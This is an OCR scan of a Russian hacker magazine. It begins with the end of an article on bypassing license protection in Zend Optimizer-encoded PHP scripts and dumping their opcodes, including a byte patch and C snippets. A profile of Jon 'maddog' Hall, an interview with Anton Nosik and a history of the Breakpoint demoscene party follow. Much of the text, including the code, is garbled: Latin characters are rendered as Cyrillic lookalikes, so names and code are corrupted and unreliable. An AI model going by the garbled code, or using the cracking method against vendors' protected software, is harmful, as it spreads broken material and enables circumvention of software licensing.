ла функции орсосіепит. Сама же таблица, по 
которой мы получаем оригинальные номера 
опкодов, генерируется в зависимости от 
контрольной суммы. Алгоритм генерации я вы- 
кладывать не буду: он достаточно громоздкий. 
Найти его очень легко — надо просто просле- 
дить, куда уходит хэш. Вот почему мы не можем 
менять контрольную сумму просто так, ведь 
«съедут» все смещения опкодов, и интерпре- 
татор начнет выполнять чушь. Поэтому если 
мы хотим поменять хэш, то нам надо поменять 
все смещения опкодов во всем скрипте. 
Резюмируя данную главу, отмечу: вся лицензи- 
онная защита скрипта обходится буквально за 
5 минут. Есть и другой вариант обхода — пра- 
вить сам Оріітігег, но это не универсальный 
вариант, так как на чужом хостинге никто не 
даст этого сделать. 

Получение дампа скрипта 

Хочу заметить, что у кодировщика существует 
несколько уровней оптимизации: ІиІІ, тіпітаі, 
попе. Напоминаю, что мы остановились на 
последнем параметре «битту.асісіг». При 
оптимизации уровня ІиІІ кодировщик сразу 
записывает после «битту.асісіг» количество 
функций, для имен которых предварительно 
рассчитан хэш. 




Оптимизация уровня ?иІІ 



В нашем случае функций всего две (в оптими- 
зации уровня тіпітаі и попе предварительно 
рассчитанные хэши для функций отсутствуют). 
Это — зеЦ:іте_ІітіІ и ргіпФ Хэш для них вычис- 
ляется нехитрой функцией из 2 епсІ\ 2 епб_ 
ИазИ.И исходников РНР. Чтобы понять дальней- 
шее описание, советую ознакомиться с вирту- 
альной машиной 2епб, а в частности, с такими 
ключевыми структурами, какгепсІ_ор_аггау и 
2 епб_орсобе. Структура гепсІ_ор_аггау — описа- 
тель функции, в которой содержится указатель 



на массив опкодов 2 епсІ_орсосІе. Каждый скрипт 
начинает выполняться с функции таіп. Далее в 
нашем скрипте идут данные, которые заполняют 
структуру гепб_ор_аггау для функции таіп. Есть 
два варианта получения дампа: 

1 . Разобрать полностью 2епб Оріітігег, 
посмотреть, какие данные он кладет в какие 
структуры и т.д. Ну и написать программу 
парсинга. 

2 . Вежливо попросить сам оптимайзер сде- 
лать это для нас. 

Скажу сразу: вначале я пошел по первому 
пути. Через день я понял, что это задача не для 
первого класса :). И тогда на ум пришел второй 
вариант. В движке 2епб есть две стадии: ком- 
пиляция скрипта (парсинг, заполнение всех 
структур для виртуальной машины) и запуск 
скрипта. За первое отвечает функция, на кото- 
рую указывает указатель 7епб_сотріІе_ІіІе, за 
второе — указатель гепсІ_ехесиіе. При старте 
движка рбр загружаются все его расширения, 
в том числе и оптимайзер, который изменя- 
ет указатель вместо стандартной функции 
компиляции на свою. То есть принцип действия 
примерно такой: 

// инициализируем движок 
рІір_тосІиІе_зіагіир(&сІІ_зарі_тосІиІе, І\ІІЛ_І_, 0); 

Д1е_Напс11е->Напс11еТр = ѴС\Ш_РОРЕМ(зсгірЩіІе, "гЬ"); 
//открываем файл 
!іІе_ЬапсІІе.іуре = 2ЕІ\Ю_НАІ\ЮІ_Е_РР; 
Л1е_Напс11е.орепес1_ра1:Н = І\ІІЛ_І_; 
ІІІе^апсІІе.ТееДіІепате = 0; 

рИр_гедиезЩзіагіир(ТЗРМІ_5_С); //запускаем движок 
// вызываем функцию для получения опкодов 
таіп_ор_аггау = 2 епсІ_сотріІеДіІе(&ііІе_ІпапсІІе, 
2ЕІ\Ю_ЕѴАІ_ТЗРМІ_3_СС); ... 

Все, теперь у нас в памяти есть полностью 
готовые к выполнению структуры. Для получе- 
ния текстового дампа можно воспользоваться 
утилитой Ѵиісап І_одіс ЭізаззетЫег ( Мр:// 
бегіскгеіИапз.пІ/ѵІб.рИр ). Есть небольшое «но»: 
оптимайзер для версии РНР 5. 1 .х выставляет 
адреса-обработчики опкодов, при этом зати- 
рая номера опкодов. 

Чтобы получить нормальный дамп, надо попро- 
сить оптимайзер не делать этой глупости: 

0000026В: С6 90 
00000260:44 90 
00000260:28 90 
0000026Е: 58 90 
0000026Р: 00 90 

Теперь можно свободно дампить, используя ѵісі: 

ѵІсІ_сІитр_ораггау(пеѵѵ_ор_аггау); 
гепсЦпазЩаррІу (СО(йіпсІіоп_ІаЫе), (аррІуДипс_і) 
ѵІсМитр_Іе ТЗВМІ_3_СС); 

2 епсІ_НазН_аррІу (СО(сІазз_1аЫе), (аррІуДипс_1:) 
ѵІсІ_сІитр_сІе ТЗВМІ_5_СС); 

Например, для скрипта: 

<?рНр 

зеі_ііте_1ітіі(0); 
ргіп^С'ЗсгірІ: зІагіѴі"); 



$а = 5; 

$Ь — $а + 6; 
есІпо$Ь; 

?> 



... закодированного без оптимизации, это 
будет выглядеть так: 

к* а*- 




Пример пампа 



Естественно, ѵісі далек от идеала, и в процессе 
написания программы восстановления исход- 
ного кода он был почти полностью переписан. 
Восстановить исходный код — задача скорее 
на усидчивость. Необходимо разобрать всю 
виртуальную машину и понять, для чего исполь- 
зуется каждый опкод. Исходники РНР можно 
свободно скачать с официального сайта ( ѵѵѵѵѵѵ. 
рбр.пеі У Например, у меня эта задача заняла 
около 3-х месяцев неспешной писанины в 
свободное отучебы и работы время. Сразу хочу 
сказать, что конструкции типа (ІІ\ІІТ_РСАІ_І__ВѴ_ 
ЫАМЕ, ЗЕЫЭ_ѴАІ_, 00_РСА1_1__ВУ_МАМЕ) очень 
легко сворачиваются в вызове функции, а 
(РЕТСН, АЗЗІОІЧ) — в присваивании перемен- 
ной значения. В общем, в получении исходного 
кода ничего сложного нет. 

Вместо заключения 

Общая уязвимость протекторов исходного 
кода РНР такого вида состоит в том, что необ- 
ходимо всегда передавать массив опкодов в 
виртуальную машину. Это место всегда можно 
отловить и сделать дамп/получить исходный 
код. Что касается самого 2епб Оріітігег, 
отмечу, что все читаемые из скрипта данные он 
принимает за чистую монету. Во время экспе- 
риментов очень часто падал оптимайзер или 
сам рбр, причем иногда интерпретатор оказы- 
вался в совершенно левых участках памяти, 
в которых он, по сути, находиться не должен. 
Это еще одно поле для поиска уязвимостей. 

А если веб-сервер работает с правами рута 
и стоит тос1_рНр. . . Но это уже совсем другая 
история, зс 



ОАЫСЕК 

Все описанные в этой статье действия 
носят исключительно исследователь- 
ский характер и направлены, в первую 
очередь, на исследование слабых мест в 
защите интеллектуальной собственнос- 
ти. Уважайте труд программистов! 
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Сцена / 01 




Йон Холл родился в небольшом американском 
городке штата Нью-Йорк. В 4 года он поставил 
свой первый эксперимент с техникой, воткнув 
телевизионную антенну в розетку, в результа- 
те чего получил немаленький разряд током и 
отлетел в противоположную сторону комнаты. 
Этот опыт произвел на него неизгладимое 
впечатление, наглядно продемонстрировав, 
сколь велика мощь технологий, и повлияв 
на выбор карьеры. Поступив в университет 
Дрекселя, Йон выбрал среди курсов элект- 
ронную инженерию и компьютерную науку, 
полностью углубившись в их изучение. В 60-е 
годы учебных заведений, имеющих узкоспе- 
циализированный компьютерный факультет, 
практически не было. Студентам, которые 
решили изучать компьютеры, приходилось 
брать «в нагрузку» дополнительный предмет. 
Йон взял бизнес-курс. Первыми его компью- 
терами стали ІВМ 1 130 и РОР-8, на которых 
он постигал РОРТРАЫ и ассемблер. РЭР был 
особенно привлекательным, так как, в отличие 
от громоздких мейнфреймов, на этой машине 
студентам разрешалось работать в любое вре- 
мя. Большую часть знаний Йон получал сам, 
читая редкие книги и применяя полученный 



опыт на практике. Защитив степень бакалавра, 
он устроился на работу, в фирму Аеіпа ЫІе апсі 
Сазиаііу, где занялся ассемблерным програм- 
мированием мейнфреймов ІВМ. А в свободное 
от работы время продолжал заочное обучение в 
одном из нью-йоркских вузов, готовясь получить 
степень магистра компьютерных наук. Через 4 
года, став магистром, Йон всерьез задумался о 
возможности преподавания, и в конце концов 
договорился с руководителем небольшого тех- 
нического колледжа, где стал вести компьютер- 
ный курс. Как потом скажет Йон в одном из своих 
интервью, это были лучшие годы его жизни — он 
получал огромное удовольствие от общения и 
обучения молодежи. Студенты запомнили его 
как безумно вспыльчивого и строгого профес- 
сора, который не делает поблажек ни себе, ни 
другим. И прозвали его Маббод (сумасшедшая 
собака) — под этим прозвищем он со временем 
станет известен всему ІІІ\ІІХ-сообществу. 
Преподавательская деятельность не приносила 
большого дохода, и за 3,5 года работы в коллед- 
же Йон задолжал государству $4000. Пришлось 
принять решение: оставаться и наращивать долг 
или перейти на работу в успешную коммерчес- 
кую компанию. Холл выбрал второе, тем более 



что компания ВеІІ уже давно приглашала талан- 
тливого программиста к себе. Ему удвоили за- 
рплату и продолжали ее увеличивать довольно 
быстрыми темпами. Йон работал главным 
системным администратором и именно в 
ВеІІ впервые познакомился с операционной 
системой ІІІЧІХ. Правда, карьера в телефон- 
ной компании не была долгой. После того как 
Йон узнал, что ЭідііаІ Ециіртепі Согрогаііоп 
создала группу по разработке собственной 
ІІЫІХ-совместимой системы и набирает штат 
сотрудников, Маббод решил перейти к ним. 

Он преклонялся перед ОЕС еще в институте, 
работая на их компьютерах, к тому же сам проект 
обещал быть весьма увлекательным. Работая 
в ОідііаІ Ециіртепі, Йон Холл познакомился со 
многими интересными людьми, включая Линуса 
Торвальдса, которому помог портировать І_іпих 
на 64-битные процессоры АІрИа. 

Незадолго до приобретения Эідііаі Ециіртепі 
компанией Сотрац Йона избрали исполнитель- 
ным директором некоммерческой организации 
ипихіпіегпаііопаі, и в 1999-м году, когда ЭЕС 
перешла к новому владельцу, профессор Холл 
оставил свой пост, чтобы все свое время посвя- 
тить развитию І_іпих. 
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черезі 0 лет Ыпих 

^править миром. 

Возможно, раньше это звучало как шутка, но теперь это очевидно» . 



Известные хобби: 

Ходить в гости к друзьям, путешество- 
вать, фотографировать, ездить на джипе, 
встречаться и общаться с линуксоидами. 



Проекты: 

Основным проектом Йона Холла 
был и остается Ыпих. Он написал 
множество статей об этой ОС в 
разные газеты и журналы, а также 
несколько книг для серии «Рог 
биттіез», включая «І_іпих для 
чайников», « РесІ На* Ыпих Ребога 
для чайников», «Ыпих іп а Вох для 
чайников» и несколько других... 




«Я хотел бы, 
чтобы в сут- 
ках было 

часов, 



или чтобы я умел не 
спать. 

Также было бы здорово иметь собствен 
ный телепортер, как в Стар Треке, и не 
тратить время на бесконечные переле- 
ты». 




«Что может сделать 
меня счастливым? 

Хорошие 

друзья, 

полные 

энтузиазма 

студенты и 

теплый 

песчаный 

пляж». 



\ 

Чем занимается сейчас: 

Йон Маббод Холл объездил с лекци- 
ями по Ыпіх и Ыпих практически весь 
мир. Он желанный гость на любых 
технических конференциях и является 
активным сторонником свободного 
ПО, продвигая идеи опенсорсного 
движения в массы. Многие считают 
его одним из лидеров орепзоигсе 
тоѵетепі, наряду с Ричардом 
Столлманом. Параллельно своей 
работе в Ыпих Іпіегпаііопаі, Маббод 
сотрудничает с корпорацией Зііісоп 
ОгарИісз и поддерживает многие 
некоммерческие сетевые проекты 
по опенсорс и программированию 
(например, ІІЗЕІМІХ Аззосіаііоп). 
; 



Цитаты: 

«Больше всего меня злит, когдалюди говорят: 
"Это нельзя сделать"». Обычно это значит, что 
это сделать сложно, но я много раз демонстри- 
ровал, как вещи, которые считались невоз- 
можными, делаются без проблем за несколько 
часов». 

«У русских есть гордость. Они знают, что такое 
воровство и не любят этого делать. Они видят 
маленькие пластиковые СЭ, штамповка которых 
стоит не больше доллара, и с трудом понимают, 
почему кто-то продает их по цене $500-600» . 



«Самая поразительная вещь в Ыпих — это эн- 
тузиазм сообщества, отношение этих людей, 
которое можно выразить двумя словами: «сап 
бо». 

«На конференции в Австралии, в 1997-м году, 
я встретил ТИео бе Пааб*, который сообщил о 
скором закрытии провайдером его сетевого 
проекта ОрепВЗЭ, поскольку он не в состо- 
янии заплатить $300 за хостинг. Я достал 
чековую книжку и тут же выписал ему чек на 
$300, вручив со словами: «Твой проект слиш- 



ком ценен, чтобы позволить ему умереть из-за 
каких-то $300». 

«Многие бизнесмены боятся свободы. Они 
не верят, что качественная вещь может быть 
бесплатной, что свободный труд может принес- 
ти пользу. Они полагают, что деньги дают им 
контроль. Но на самом деле, если говорить о 
программировании, работники коммерческих 
компаний пишут программы не потому, что 
хотят, а потому, что им говорят это делать. Этим 
они отличаются от опенсорсного движения». 
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ДАНЯ ШЕПОВАЛОВ 

/ ѴѴѴѴѴѴ.ОАЫѴА.НІІ / 



Сцена / 02 




Антон Носик: 






ФОТО: ѴѴѴѴѴѴ.НАНОСОРУ.НЦ 
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X: Антон, судя по твоему ЖЖ, ты прямо-таки 
живешь в самолетах. Почему? 

А: Потому что там кормят, ухаживаютзатобой, 
в мягкое кресло сажают, кино показывают. 

X: А если бы тебе нужно было выбрать одну 
страну и один город, где пришлось бы жить 
всю оставшуюся жизнь, что бы ты выбрал? 

А: Ну, я бы удавился наверное. . . 

X: Арсен Ревазов в книге «Одиночество- 12» 
пишет о тебе как о человеке, который изъ- 
ясняется исключительно фразами типа: «А 
теперь зае#$ниваем вот такую х$%ню, чтобы 
зло@#учие п%$оры отсасывали, не нагиба- 
ясь». Что можешь сказать по этому поводу? 
А: Я действительно знаю эти слова и время 
от времени их употребляю. Еще Антон Пав- 
лович Чехов заметил, что если вы напишете 
I огромный трактат о спасении человечества 
и наступлении всеобщего счастья, и во всем 
I этом огромном вашем труде в одном месте бу- 
I дет стоять слово «жопа», то можете быть уве- 
| рены, что читатели обратят внимание именно 
інего. 



при наличии заявления от пострадавших. Но 
я не подавал никогда заявления в милицию по 
факту взлома сайтов. Один раз, когда взло- 
мали Ленту. ру, я просто провел голосование: 
нужно ли подавать заявление, или хрен с ним. 
Читатели решили, что «хрен с ним». 

X: Ты когда-нибудь пытался создать аван- 
тюрный проект в духе ті11іопсіо11агЬотера§е. 
сот? 

А: МіІІіопбоІІагИотераде — этооченьхороший 
пример для людей, ктоторые задают вопросы 
такого типа: «Ачто вообще в этом интернете?». 
Лайвджорнал ничем от тіІІіопбоІІагИотераде I 
не отличается, ну разве что на Ы больше тру- 1 
да потратили и больше денег заработали. В | 
принципе, интернет состоит из бесчисленно- 
го множества примеров того, как люди нашли I 
удачную формулу, потратили несколько часов 
на ее реализацию и прогремели. Потом сле- 
дом за ними пришли сотни тысяч других людей, і 
которые ничего своего придумать не в состо- 1 
янии, которые будут тупо копировать чужой | 
успех, и у них ничего не получится. Например, 
в 1996-м году была замечательная статья Ро- 



X: А онлайн-игры? 

А: Я фигею! Для того, чтобы просто посмот- 
реть, что представляет собой эта онлайновая 
игра, мне нужно зарегистрироваться и выучить 
всю эту иерархию монстров и волшебников, а 
также почем нынче булава и тараканьи шипы . . . 
Да я лучше китайский язык выучу! Зачем заби- 
вать голову всей этой ерундой? Если хочется 
пообщаться, то есть замечательные сервисы 
типа мамбы. 

X: Подвисаешь на мамбе? 

І А: Да, люблю этот сервис. В мамбе можно что 
угодно делать с людьми, которых ты там встре- 
тил. А если хочется денег заработать — найди 
себе хорошую специальность. Люди, зара- 
батывающие деньги на компьютерных играх, 
— это китайские крестьяне, которые приходят I 
в интернет-кафе, весь день добывают сокро- 1 
^ вища, потом сдают их хозяину кафе, получают 

І свои 50 юаней и уходят домой, ахозяин на еВау | 
продает эти артефакты. А что касается созда- 
телей игр, они эксплуатируют спрос. Таким об- 1 
разом, они ничем не отличаются от производи- 
телей сигарет, алкоголя, оружия, наркотиков 



«В ОБЩЕМ, ГРУСТНО ВСЕ! ДА ЖИЗНЬ ВООБЩЕ 
НЕВЕСЕЛАЯ ШТУКА! » я 



X: А почему в ЖЖ ты выбрал юзернейм 
боІЪоеЪ? 

А: Чтобы не цитировали в прессе. 

X: Часто у тебя пытаются украсть ІС(^? 

А: ІСО у меня пытались украсть раз шесть. Я 
бы возвращал методом убеждения, но, к сожа- 
лению, у этих людей нет возможности поль- 
зоваться моей аськой, потому что, как только 
они вылезают в онлайн, получают 700 раз 
«привет!», а если люди узнают, что у меня ук- 
рали аську, то 700 раз «отдай аську, подонок! » . 
После чего подонок ретируется из этой аськи 
и делает все возможное, чтобы ее продать. А в 
это время компания ІСО восстанавливает мне 
пароль. 

X: А персональные атаки производятся на 
тебя или на твои проекты? 

А: Атаки же производятся не персонально, а 
просто ходит робот, сканирует. И как только 
компьютер подключился к сети, в ту же се- 
кунду происходит пробой портов. Если ты на 
біаіир’е подключаешься без предварительно 
включенного ІігеѵѵаІІ, то на заражение требу- 
ется примерно одна минута. Это очень легко 
заметить, потому что после этого компьютер 
просит перегрузиться... Естественно, были 
попытки взлома моих проектов, в том числе 
успешные. Интересна была реакция право- 
охранительных органов, которые сказали, что 
они готовы расследовать эту историю только 



мана Лейбова про домены, где Роман Г риго- 
рьевич задумчиво рассуждал: «Вот смотри- 
те, домен аоб.сот уже занят, а домен сіеѵіі. 
сопл еще свободен. Странно как». Но если 
бы он зарегистрировал эти домены, сегодня 
он был бы миллиардером. В интернете таких 
возможностей, как «пришлите мне рубль — и 
будет вам щастье» и «заработать миллион за 
ночь», — великое множество. И надо пони- 
мать, что тіІІіопбоІІагИотераде не закрыл эту | 
тему, а всего лишь проиллюстрировал. 

X: Какой сетевой бизнес сейчас, по-твоему, | 
наиболее перспективен? 

А: Наиболее перспективен тот бизнес, кото- 
рый использует творческую энергию и по- 
купательную способность масс, потому что 
главным богатством интернета являются не те 
книжки, которые туда оцифрованы, а то, что 
там одновременно присутствуют сотни милли- 
онов людей, многие из которых являются эк- 
спертами в той или иной области, или просто 
умными людьми, приятными собеседниками, 
красивыми девушками. Перспективен пере- 
ход от формата «я вещаю, а вы все слушаете» 
к формату, когда все вещают одновременно, а 
слышно только того, кому действительно есть, 
что сказать. Это «Том Сойер красит забор», 
используя метафору Лехи Андреева. У тебя 
площадка, а ценность этой площадки опре- 
деляется теми людьми, которые эту площадку 
возделывают. 



и т.д. Они просто удовлетворяют спрос людей 
на саморазрушение. Естественно, я говорю о 
ролевых играх, а не о всяких там квейках. 

X: Какие хакерские взломы тебе больше все- 1 
го запомнились? 

А: Мне понравилась своей тупостью история 
хакера Левина, который взломал Ситибанк. 
«Тупостью» потому, что его тут же и посадили 
в тюрьму. Причем не в России, где бы до него 
никогда не дотянулись, а в Лондоне. Надо же 
понимать, где и что можно делать. Еще мне 
безумно понравилась история про то, как ФБР ^ 
выманило приглашением на работу двух рус- 
скиххакеров в Америку, чтобы там арестовать. 

И как потом российское ФСБ возбудило уго- 
ловное дело против ФБР по поводу похищения 
людей. 

X: Ну, это лажа. А блестящие взломы? 

А: А блестящих взломов и не может быть. 
Великий труд состоял в том, чтобы построить 
римский Колизей, а в его разрушении до ны- 
нешнего состояния ничего блестящего нет. 
Разрушить может любой дурак. Потому что 
не ошибается только тот, кто ничего не дела- 
ет. Неуязвимых систем не существует. Вся- 
кая система, если она работает, может быть 
сломана. У меня, как у человека создающего 
вещи, не может быть хорошего отношения к 
вандализму. 
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«Я БЫ УДАВИЛСЯ, НАВЕРНОЕ. . . » 



X: Когда последний раз дрался? 

А: Я вообще не дерусь. Такого в моей жизни во- 
обще никогда не было. Мне, наверное, должно 
быть стыдно, но таковы факты биографии. 

X: На кипу твою часто внимание обращают? 
А: Ну, я не то чтобы с утра до ночи езжу в ав- 
тобусе. Когда садишься в машину, то «что это 
у вас на голове» — это первый вопрос. Я объяс- 
няю, что по-русски это называется «ермолка». 
Русские носят крест, а евреи — такой головной 
убор. А в бедных азиатских странах, особенно 
в Китае, надо мной смеются, потому что бога- 
тый человек (иностранец) не смог купить шап- 
ку, которая бы защищала от ветра и дождя. 

X: Проблемы со скинами у тебя были? 

А: Нет, не было. Потому что в магазины, где я 
покупаюпродукты, скины пока чтоещенеходят. 
Но, очевидно, что ситуация со временем будет 
серьезно ухудшаться. Для того чтобы доказать 
публике собственную нужность и расширить 
собственные полномочия, власти нужно, что- 
бы граждане чего-нибудь сильно боялись. 
И, разумеется, скинхеды и вообще уличная 



преступность — это как жупел для обывателя. 
Они полезны для любой власти, стремящейся 
получить абсолютный контроль. Точно так же 
Джорджу Бушу полезен Бен Ладен. 

X: И чего нам ждать от властей в плане конт- 
роля за интернетом? 

А: Одно дело, что власть может залезть ко мне 
в почтовый ящик и точно узнать, кто мне что пи- 
сал и когда, с кем я разговаривал по аське и 
многое другое. За этот контроль власть долго 
боролась и победила. Тут есть СОРМ-2, есть 
обязательства операторов связи, телефонных 
операторов общего профиля, операторов мо- 
бильной связи. Понятно, что все, что мы гово- 



рим^ишем, фиксируется. И пМвоеАля чего 
ва^гето система пригодна — эш неЖорьба с 
еррором, разумеется, а только зтаупотреб- 
ление властью. Допустим, некий бизнесмен 
может прийти в органы и заказаті информа- 
цию на своего конкурента. Некий сотрудник 
спецслужб можетпроникнуться подозрением, 
что какой-то человек спит с его женой. Как от 
этого защититься? Есть такой механизм защи- 
ты, который называется «общественный кон- 
троль над деятельностью спецслужб». Это то, 
против чего выступают нынешние российские 
власти, так как они признают контроль только 
в одном направлении. Когда таких механиз- 
мов не создается, это значит, что дело идет 
к полной неуправляемости органов, к тому, 
что они, ни перед кем не отчитываясь, могут 
делать практически все. А ощущение своей 
безнаказанности еще ни одного человека не 
делало лучше, порядочнее, и главное — зако- 
нопослушнее. Надо понимать, что незаконная 
слежка за гражданами — это преступление. И 
одно преступление влечет за собой следую- 
щее. В общем, грустно все, ну да жизнь вооб- 
ще невеселая штука. . . от 
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В 2002-М ГОДУ НА ДЕМОСЦЕНЕ БЫЛО ДВА КРУПНЫХ ДЕМОПАТИ: А5- 
ЗЕМВІ_У И МЕККА & ЗУМРОЗЮМ. АССЕМБЛИ БЫЛ БОЛЕЕ ПОПУЛЯРНЫМ, 
НО В ТО ЖЕ ВРЕМЯ БОЛЕЕ «ГЕЙМЕРСКИМ». ЗНАЧИТЕЛЬНУЮ ЧАСТЬ 
КОМПЬЮТЕРОВ, ПОДКЛЮЧЕННЫХ К ЛОКАЛЬНОЙ СЕТИ АССЕМБЛИ, 
ЗАНИМАЛИ ПИСЮКИ ИГРОМАНОВ, ВАРЕЗНИКОВ И ПРОСТО ЛЮДЕЙ, 
КОТОРЫЕ ПРИШЛИ ПОТУСОВАТЬСЯ. А СЦЕНЕРАМ ПРИХОДИЛОСЬ 
ЮТИТЬСЯ В СПЕЦИАЛЬНО ОТВЕДЕННОМ ДЛЯ НИХ ПОМЕЩЕНИИ. МЕККА 
В ТО ЖЕ ВРЕМЯ СПЕЦИАЛИЗИРОВАЛАСЬ НА СЦЕНОВЫХ ЭВЕНТАХ, И ЕЕ 
ОСНОВНЫМ КОНТИНГЕНТОМ ЯВЛЯЛАСЬ СЦЕНОВАЯ ЭЛИТА. ПОНЯТНОЕ 
ДЕЛО, ЧТО НАСТОЯЩИЕ СЦЕНЕРЫ С БОЛЬШИМ НЕТЕРПЕНИЕМ 
ЖДАЛИ ИМЕННО МЕККУ. НО НЕОЖИДАННО ДЛЯ ВСЕХ ОРГАНИЗАТОРЫ 
ОБЪЯВИЛИ, ЧТО ФЕСТИВАЛЬ 2002-ГО ГОДА СТАНЕТ ПОСЛЕДНИМ. 
ПРИЧИНОЙ ЭТОГО ОКАЗАЛИСЬ СПОРЫ И НЕДОПОНИМАНИЕ 
ВНУТРИ ОСНОВНОГО ОРГАНИЗАТОРСКОГО СОСТАВА. ЧАСТЬ ЭТИХ 
ЛЮДЕЙ В РЕЗУЛЬТАТЕ УШЛИ СО СЦЕНЫ, А ТЕ, КТО ОСТАЛИСЬ, НЕ 
СПЕШИЛИ СТАВИТЬ НА ПАТИ КРЕСТ, А ВМЕСТО ЭТОГО СВЯЗАЛИСЬ ' 

С СОЗДАТЕЛЯМИ ДРУГИХ, МЕНЕЕ ИЗВЕСТНЫХ СЦЕНОВЫХ ТУСОВОК ■ 
(ОІАЬОѲОЗ И ТНЕ ІЛ_ТІМАТЕ МЕЕТІЫО) И ПРЕДЛОЖИЛИ ИМ СОВМЕСТНО 
ЗАБАБАХАТЬ ГРАНДИОЗНЫЙ ОІЯРООВ-ТУСНЯК В КАНУН ПАСХИ. 

ИДЕЯ НАШЛА ПОДДЕРЖКУ, И СОВМЕСТНЫМИ УСИЛИЯМИ СЦЕНЕРЫ 
ПРИСТУПИЛИ К ПОДГОТОВКЕ. 






‘Новая пати, получившая название Вгеакроіпі, стала продолжателем 
I славных традиций М&З и, подобно предшественнику, проводилась в 
Германии. Только вместо Фалингбостела — города, который раньше 
раз в год становился центром сбораевропейскихсценеров, местом про- 
ведения стал Бинген — небольшой городок в предместьях Франкфурта. 
™ Здесь, на заброшенной военной тренировочной базе, и должен был со- 
( стояться первый ВгеакроіпТ Приглашения напати получили все ведущие 
Ідѳмогруппы. Многие из них, даже такие суперзвезды, как РагЬгаизсИ, с 
ДЧ удовольствием согласились принять участие. 1 8-го апреля 2003-го года, 

, когда стартовал первый день, гостей пати поразила невиданная ранее 
\ ^.атмосфера свободы. Ближайшие жилые дома находились в нескольких 
ЙрЙ километрах от базы, поэтому ни шум, ни большой костер, разведенный 
^ на поляне, не мешали очагам цивилизации, и сценеры могли веселиться 
1 вовсю. Парни отдыхали на свежем воздухе, пили пиво, общались с но- 
выми и старыми друзьями, обсуждали последние сценовые новости и 
делились впечатлениями от представленных конкурсных работ. Компо 
ВгеакроіпГа были довольно стандартными: 4К и 64К іпіго, пиксельная 
и фристайл-графика, трЗ и трекерная музыка, игровой конкурс, ѵѵіісі 
1 (где разрешается выставлять все, что угодно) и на десерт — демокомпо. 

■ Среди представленных платформ оказались РС, Атіда и С64. 

^ Пати стало по-настоящему международным — принять участие в нем 
ь приехали люди из США, Австралии, России и других стран. 

Открытие первого дня Вгеакроіпі началось в 9 вечера. Все 
основные события проходили в заброшенном военном 
Г ангаре, вход в который лежал через большой палаточный 
тент. Внутри тента можно было купить пиво, колу, здесь 
I | же находились инфоцентр организаторов и второй экран, 

! дублирующий изображение основного. Так что, если в 
| главном помещении было слишком людно, можно было 
посмотреть компо под тентом. 

По мнению сценеров, Вгеакроіпі 2003 стал одним из самых 

• успешных «чисто сценовых» пати за всю историю. Конеч- 
= “н но, не обошлось и без косяков. Например, из-за того, что 

* между столами внутри ангара имелся только один проход, 

^ после окончания каждого компо происходили настоящие 

«пробки», как на шоссе в час пик. Сценеры толпились, 
пытаясь пройти, но сделать это было не так-то просто. 

Также всем, кто был на ВР2003, запомнился жуткий холод 
внутри помещения. Организаторы потратили не одну ты- 
? „ сячу евро, чтобы отопить помещение, но установленные 
обогреватели не справлялись, ктому же некоторые из них 
ж :1 вышли из строя. Гости пати ходили в двух свитерах, кур- 
тках, но холод пробирал до костей так, что многие не вы- 
держивали и отправлялись ночевать или в гостиницу, или 
постоянно сидели у костра, чтобы не замерзнуть оконча- 

■ ^тельно. Сценеры даже окрестили пати Ргеегероіпі. 

° Если в 2003-м году организаторы Брейкпоинта полага- 



ш лись исключительно на свои силы, то в следующем году они привлекли 



крупных спонсоров, таких как АТІ ТесИпоІодіез. Благодаря поддержке 
известных брендов ценность призов возросла, а к конкурсам прибави- 
лись интересные семинары и общение с работодателями, приехавши- 
ми сюда на поиски молодых талантов. Также АТІ спонсировала верто- 
летные прогулки для посетителей — всем желающим в порядке очереди 
предлагалось полюбоваться местностью с высоты птичьего полета. На- 
звание Ргеегероіпі осталось актуальным и для Вгеакроіпі 2004, только 
ночи в этом году оказались еще холоднее. 

Кроме стандартных сценовых компо, народ экспериментировал со сво- 
ими. Например, одна из ведущих демокоманд РаігІідЫ предложила всем 
поучаствовать в конкурсе на «самого несвежего сценера». На сцену 
вышла кучка фриков, один другого неопрятнее и ароматнее, но в итоге 
безоговорочную победу одержал некий 5іг (ЗагЬаде Т шок — здоровен- 
ный дяденька с внушающей шевелюрой. Народ скандировал: «Разде- 
нься!». И сэр Трак не стал ломаться: снял сначала рубашку, а затем и 
, штаны. В конце концов его пришлось стаскивать со сцены чуть ли не ‘ 
■ силой. 

Еще одним забавным конкурсом стал объявленный во время финальной 
церемонии награждения «зигргізе сотро». Приз предназначался чува- 
ку, который за 4 дня до пати скачал больше всех порнухи с публичного 
Вгеакроіпі: РТР (заранее об этом конкурсе не говорили). Победитель 
| умудрился стянуть 65 Гб (!) порно, прикрываясь тремя разными айпиш- 
никами. Но админы 4го просекли и публично наградили 10-метровой 
распечаткой сетевых логов. 



ФИШКИ, ОБЕЩАННЫЕ 
ОРГАНИЗАТОРАМИ ВПЕАКРОІІЧТ 
2006 

комфортное место проведения , вмещающее до 1 000 человек одновре- 
менно; 

• множество семинаров для демосценеров; 

• огромный проектор и мощнейшая звуковая система;Я 

• отдельные помещения для отдыха и сна; 

• чистые туалеты; 

• бесплатный автобусный сервис для быстрого перемещения сценеров к 
отелям, ж/д станциям, супермаркетам и другим важным объектам; 

превосходный виноградный сад, где сценеры могу пообщаться на при- 
роде, посидеть и согреться у традиционного костра; 
еда и напитки — круглосуточно; 

• высокоскоростная сеть с бесплатным доступом в интернет;^ 
возможность зарезервировать места в ближайшем отеле 

Іс 50% скидкой; іѣ ■ I 

отсутствие скрипткидисов и геймеров. Только креативный народ; 
дружелюбная атмосфера, где просто витает сценерский дух. 
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В 2005-м году правительство Г ермании закрыло доступ к военной базе, ^ 
и организаторам Брейкпоинта пришлось искать новое место для про- ^ 
ведения своего пати. В итоге решили собрать народ в центре Бингена, 
в здании местного спорткомплекса, по внешнему виду напоминающего 
летающую тарелку. Многие опасались, что проведение пати в городе 
ограничит свободу сценеров, и тусовка не будет такой атмосферной и 
р безбашенной, как раньше. Как оказалось, опасались зря. Поблизости 
ісо спортзалом находилась уютная лужайка, где сценеры с удобством д 
| разместились и даже смогли разжечь уже традиционный костер. Также 

I удалось решить проблему с отоплением, поэтому внутри можно было . 
ходить в футболках. Народ так привык к холодным брейкпоинтовским 
ночам, что в шутку предлагал ночевать на открытом воздухе, «чтобы вер- 
I нуть дух первых двух пати » . 

В этом году организаторы арендовали новый проектор, в несколько раз | 
■больше предыдущего. Поскольку вид здания по форме напоминал НЛО, 
■они решили добавить колорита и украсили стены внутренних коридоров 
«разного рода безделушками, чтобы усилить инопланетный эффект. Кос- 
мическая тема стала центровой также в реалтайм демокомпо — предла- 
